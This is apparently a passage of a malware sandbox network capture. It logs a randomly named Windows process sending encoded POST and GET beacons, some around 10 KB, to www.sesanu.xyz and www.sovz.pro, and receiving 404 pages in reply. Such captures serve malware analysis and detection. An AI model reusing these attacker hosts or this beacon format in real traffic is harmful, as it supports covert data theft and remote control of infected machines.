                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.450023199.192.21.169802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:54.798651934 CET10828OUTPOST /rf25/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.sesanu.xyz
                                                                            Origin: http://www.sesanu.xyz
                                                                            Referer: http://www.sesanu.xyz/rf25/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 10305
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 32 49 58 32 44 43 54 4c 63 33 6a 47 2f 67 46 74 47 47 6a 49 2b 45 78 54 66 6e 6c 45 2b 4d 32 68 52 51 42 31 47 78 70 53 4d 50 34 76 44 43 49 45 54 4b 38 6c 61 63 59 79 47 78 56 79 38 43 33 68 34 54 58 67 51 75 36 30 48 58 4b 50 42 69 63 73 50 59 67 72 39 79 52 4c 78 52 63 71 36 59 46 50 64 70 66 37 6b 49 35 63 68 71 6a 45 63 62 72 58 66 54 68 62 66 77 49 31 71 53 76 72 70 4f 55 65 46 44 72 48 69 42 70 64 68 69 72 7a 64 52 74 75 49 64 38 41 75 33 4e 78 30 46 52 49 67 4d 68 4f 77 43 39 4f 52 44 43 68 58 43 51 4c 52 62 52 78 46 58 2b 73 69 66 52 38 64 71 63 6f 43 4d 59 56 4c 75 47 32 4d 30 42 4d 66 6a 2f 6d 42 35 76 65 41 33 56 54 69 65 53 2f 44 50 32 78 68 72 58 4a 54 36 76 4f 6e 79 4d 37 46 50 75 4e 6c 6c 78 2b 33 43 54 34 77 68 47 36 53 66 77 6d 62 66 73 70 67 48 4e 5a 55 6a 2f 49 49 73 53 62 59 4f 69 71 76 70 41 49 77 31 2f 4e 46 77 78 35 75 55 69 71 52 30 56 2b 4c 56 44 6c 2f 55 45 35 35 2b 4b 48 6f 34 35 51 44 57 49 65 7a 73 6d 45 68 49 72 77 77 49 4a 73 68 66 57 59 33 [TRUNCATED]
                                                                            Data Ascii: idTDev6P=2IX2DCTLc3jG/gFtGGjI+ExTfnlE+M2hRQB1GxpSMP4vDCIETK8lacYyGxVy8C3h4TXgQu60HXKPBicsPYgr9yRLxRcq6YFPdpf7kI5chqjEcbrXfThbfwI1qSvrpOUeFDrHiBpdhirzdRtuId8Au3Nx0FRIgMhOwC9ORDChXCQLRbRxFX+sifR8dqcoCMYVLuG2M0BMfj/mB5veA3VTieS/DP2xhrXJT6vOnyM7FPuNllx+3CT4whG6SfwmbfspgHNZUj/IIsSbYOiqvpAIw1/NFwx5uUiqR0V+LVDl/UE55+KHo45QDWIezsmEhIrwwIJshfWY3a8sdPkqa5OeRv2KrywGljJQp6FSW1ptYDp/pY7QyPXAk5dE6YK2M3Et9OM1nhEWX5PWwd7AJ6v9pdHqVeFLi8vtHwwmfbGFX5lETGFjEYfSOcyeMF/Y4FCxFPD8KDz4WNUFLhQQaUI9aWtWN3E5pUN2RT4TK4EfPnJOOik8cSwpaW708ptgLE+O7dXcuIA4XSvxzZziWas5Zf7dU+LejlBDXedKDU9M+wcaezWanYOZ+iGRmBzkuzGrXk/PBG+GGs/x3FUpHLUpaEZCr6iNliYAI6NDva+y0We/y7MSx6yG03+jkkgALm+l8fzcSMeizk1QFH1uTokiXkgwBGJlN6n//iPnt1f3KnP8jbvoDfPdAMtxjnvlaHWDpDBPZ75ZrQGOAoPSr7ZFH7atKHrTlBorFBvIYmZXhzQ6aqWdhasY8x05KHh7/l1OBsSh3qbduN+X6y+jeU4mViOpQy5hwFmdf88+Xmd4l9XsgsywNMhifgFegDcNCvNMc6ek56Nsj9y2hq4R3S5IKjWVxES0KSLHHKGcmVW5yc9oUbdzBkCYwayUiVpebt9+mazbbYJGWV5t7kc4uV3HYBZM1w7Yo4jJzuvYrs2+LQnf3BnuVzUo3Xgc3su33rqBvLtxdFAmnkwSb+r3sfyk/ZPCP8RjMFgad+DIKBIMsEn [TRUNCATED]
                                                                            Jan 13, 2025 10:20:55.455426931 CET918INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 13 Jan 2025 09:20:55 GMT
                                                                            Server: Apache
                                                                            Content-Length: 774
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.450024199.192.21.169802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:57.342422962 CET464OUTGET /rf25/?idTDev6P=7K/WA23tcmDFyzNLMn/EpU9MVXFD0cPmQwJwfw98BfkTBnsrTY46HewHDC14kj2B/CLZPuq7EXqCGidtAJMC1i5W2RZanfRuX6/plfhQnf3YS6vnQQobeR4=&z2=LHT8eHbp3J HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.sesanu.xyz
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Jan 13, 2025 10:20:57.941283941 CET933INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 13 Jan 2025 09:20:57 GMT
                                                                            Server: Apache
                                                                            Content-Length: 774
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.45002545.130.41.107802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:03.103882074 CET720OUTPOST /vwha/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.sovz.pro
                                                                            Origin: http://www.sovz.pro
                                                                            Referer: http://www.sovz.pro/vwha/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 205
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 7a 33 37 46 4d 71 64 4a 59 59 7a 44 32 72 4d 55 78 33 6c 6b 6c 70 4a 43 41 58 56 6c 55 35 78 6e 64 44 48 58 74 43 6c 42 77 6f 64 53 48 7a 70 2f 33 31 6d 31 6c 38 6c 61 62 34 31 30 43 59 37 70 54 48 68 53 6e 44 33 65 72 57 65 73 34 50 41 62 71 56 34 67 42 68 47 49 4d 44 73 2f 6a 55 4c 61 39 4d 4d 52 59 4f 53 74 4b 4c 6d 59 79 39 49 6f 58 77 62 70 78 59 41 2f 66 77 4c 68 30 6c 5a 62 6d 78 61 52 44 69 4f 62 56 76 55 70 41 6f 4f 5a 74 74 76 5a 4c 33 37 64 45 5a 63 32 41 39 72 73 38 41 36 63 74 55 4c 73 30 4a 42 36 37 6a 33 6c 31 46 46 2b 4b 69 61 4e 43 59 44 5a 31 79 52 74 6e 67 3d 3d
                                                                            Data Ascii: idTDev6P=z37FMqdJYYzD2rMUx3lklpJCAXVlU5xndDHXtClBwodSHzp/31m1l8lab410CY7pTHhSnD3erWes4PAbqV4gBhGIMDs/jULa9MMRYOStKLmYy9IoXwbpxYA/fwLh0lZbmxaRDiObVvUpAoOZttvZL37dEZc2A9rs8A6ctULs0JB67j3l1FF+KiaNCYDZ1yRtng==
                                                                            Jan 13, 2025 10:21:03.830943108 CET475INHTTP/1.1 404 Not Found
                                                                            Server: nginx-reuseport/1.21.1
                                                                            Date: Mon, 13 Jan 2025 09:21:03 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA|2RU#a0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.45002645.130.41.107802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:05.655002117 CET740OUTPOST /vwha/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.sovz.pro
                                                                            Origin: http://www.sovz.pro
                                                                            Referer: http://www.sovz.pro/vwha/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 225
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 7a 33 37 46 4d 71 64 4a 59 59 7a 44 73 49 45 55 79 51 4a 6b 30 5a 4a 44 63 6e 56 6c 66 5a 77 50 64 44 44 58 74 44 52 52 77 36 35 53 48 57 74 2f 35 55 6d 31 6b 38 6c 61 4f 49 31 78 47 59 36 6c 54 48 73 6e 6e 41 76 65 72 57 4b 73 34 50 51 62 71 6b 34 76 41 78 48 75 56 54 73 48 74 30 4c 61 39 4d 4d 52 59 4f 47 44 4b 50 4b 59 79 4e 34 6f 58 52 62 32 79 59 41 34 56 51 4c 68 6a 56 5a 41 6d 78 61 6a 44 6d 4f 68 56 74 73 70 41 71 47 5a 73 34 44 61 42 33 37 68 62 70 64 49 49 65 76 67 30 6c 4c 4a 69 56 2f 57 37 4a 52 5a 33 46 36 2f 6b 30 6b 70 59 69 2b 2b 66 66 4b 74 34 78 73 6b 38 70 58 32 47 38 68 78 76 43 61 6a 71 70 55 2b 5a 68 78 70 59 70 34 3d
                                                                            Data Ascii: idTDev6P=z37FMqdJYYzDsIEUyQJk0ZJDcnVlfZwPdDDXtDRRw65SHWt/5Um1k8laOI1xGY6lTHsnnAverWKs4PQbqk4vAxHuVTsHt0La9MMRYOGDKPKYyN4oXRb2yYA4VQLhjVZAmxajDmOhVtspAqGZs4DaB37hbpdIIevg0lLJiV/W7JRZ3F6/k0kpYi++ffKt4xsk8pX2G8hxvCajqpU+ZhxpYp4=
                                                                            Jan 13, 2025 10:21:06.369592905 CET475INHTTP/1.1 404 Not Found
                                                                            Server: nginx-reuseport/1.21.1
                                                                            Date: Mon, 13 Jan 2025 09:21:06 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA|2RU#a0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.45002745.130.41.107802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:08.208034039 CET10822OUTPOST /vwha/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.sovz.pro
                                                                            Origin: http://www.sovz.pro
                                                                            Referer: http://www.sovz.pro/vwha/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 10305
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 7a 33 37 46 4d 71 64 4a 59 59 7a 44 73 49 45 55 79 51 4a 6b 30 5a 4a 44 63 6e 56 6c 66 5a 77 50 64 44 44 58 74 44 52 52 77 36 78 53 48 41 52 2f 35 33 2b 31 69 4d 6c 61 50 49 31 77 47 59 37 2f 54 48 30 72 6e 41 6a 6f 72 55 79 73 34 74 6f 62 73 57 51 76 4b 78 48 75 49 44 73 38 6a 55 4b 41 39 4d 64 61 59 4f 57 44 4b 50 4b 59 79 4c 30 6f 44 51 62 32 2f 34 41 2f 66 77 4c 74 30 6c 59 76 6d 78 44 57 44 6d 43 4c 56 63 4d 70 41 4b 32 5a 76 4f 33 61 4a 33 37 6e 61 70 64 41 49 5a 6d 2b 30 6b 6a 2f 69 56 4c 38 37 4c 4e 5a 33 41 53 6a 32 58 6b 50 43 52 6a 6e 47 2b 2b 30 78 78 77 7a 38 37 54 5a 50 64 35 2b 31 68 2b 76 6d 4b 6c 47 49 51 70 4f 4c 38 50 6d 31 67 44 50 6b 32 6e 44 45 61 53 63 46 71 79 6c 45 6d 56 6b 4c 73 6e 2f 63 4c 34 72 70 55 35 44 55 56 4f 72 49 72 4e 49 2f 65 58 58 67 35 74 4d 43 50 45 2f 48 63 44 42 57 43 57 50 71 56 73 4e 52 52 2f 35 59 6c 65 61 4c 64 58 36 50 36 52 58 51 62 7a 43 44 30 4e 7a 2f 62 7a 41 66 35 30 45 75 4a 46 2b 70 36 6d 69 4a 4c 38 4b 49 73 69 71 61 [TRUNCATED]
                                                                            Data Ascii: idTDev6P=z37FMqdJYYzDsIEUyQJk0ZJDcnVlfZwPdDDXtDRRw6xSHAR/53+1iMlaPI1wGY7/TH0rnAjorUys4tobsWQvKxHuIDs8jUKA9MdaYOWDKPKYyL0oDQb2/4A/fwLt0lYvmxDWDmCLVcMpAK2ZvO3aJ37napdAIZm+0kj/iVL87LNZ3ASj2XkPCRjnG++0xxwz87TZPd5+1h+vmKlGIQpOL8Pm1gDPk2nDEaScFqylEmVkLsn/cL4rpU5DUVOrIrNI/eXXg5tMCPE/HcDBWCWPqVsNRR/5YleaLdX6P6RXQbzCD0Nz/bzAf50EuJF+p6miJL8KIsiqaiqWyChdeG5Yh+smHhhgV1FefupeM2KTQ02+5eZ6/JMuoDgGsEcsp0W7dRXrqn4LM5SmQbVXmDvXt/qTJIhIf/bN8Y457RM+z2VR5M2R77Yg0T0BGgzIuwUdIRi/uA3+8DMje5vsJHf/rrwHMeivRp1sG+OEjqW1c4qen+WWBHFpSwVGvqYJ01rJG3CiRAkRlKgjSBJUha7Xyjjfm9G027GNv+e7fg4Osgn3w1CbBzJdQGmcP3sRDao+3Q32vjaSI+477Gm5fpT23YkmM+Zxa2OGACtbAo3U2xdmDNUxSbVx8lyG1gDm5ip/WvA0FNRN+3Hf9LbyUNz2v+0XotNlym3fVYVhhUYYQd8PKdLT5ZV9gpyFhXrN2co882jYbX0akjOWPN0BJ8+B4kgWdJZI+lUK/3X4pGbcLKK/VieSdL6sd6hkGtedftDS+BA7T7/x2eCEbysYkbdh8wIw2kLXeIAKOf5n49eV3xBpe59+y7kOIRkIhnzKHfUTxddDsIyT/36TD8/XaLYhxeN5d3VId+aGMt7f7WsMdgJ+rCctA9uioqoZOCgOG/loiH5OiddRBWS+628ehYPQaxpaYPJUJ7gC7y6FLro7sS7NpXYfSkH18ef5v8penDfYGS8QROZBxj4N45y0pS/iWhc7ikbzbLaiM80ZOxRj2F0 [TRUNCATED]
                                                                            Jan 13, 2025 10:21:08.911401033 CET475INHTTP/1.1 404 Not Found
                                                                            Server: nginx-reuseport/1.21.1
                                                                            Date: Mon, 13 Jan 2025 09:21:08 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA|2RU#a0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.45002845.130.41.107802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:10.758465052 CET462OUTGET /vwha/?z2=LHT8eHbp3J&idTDev6P=+1TlPe1iHurJgrUv/lhWkNYBQhwaVohjaWb71SZDhLRDbzxX1n644MdDCZJQOu7CS35CxiD5o0aG0rIRj2YKEgG9LzsexELnrvNTZ6WsCe6wz+oUbTnhz6U= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.sovz.pro
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Jan 13, 2025 10:21:11.475172043 CET475INHTTP/1.1 404 Not Found
                                                                            Server: nginx-reuseport/1.21.1
                                                                            Date: Mon, 13 Jan 2025 09:21:11 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Content-Length: 272
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
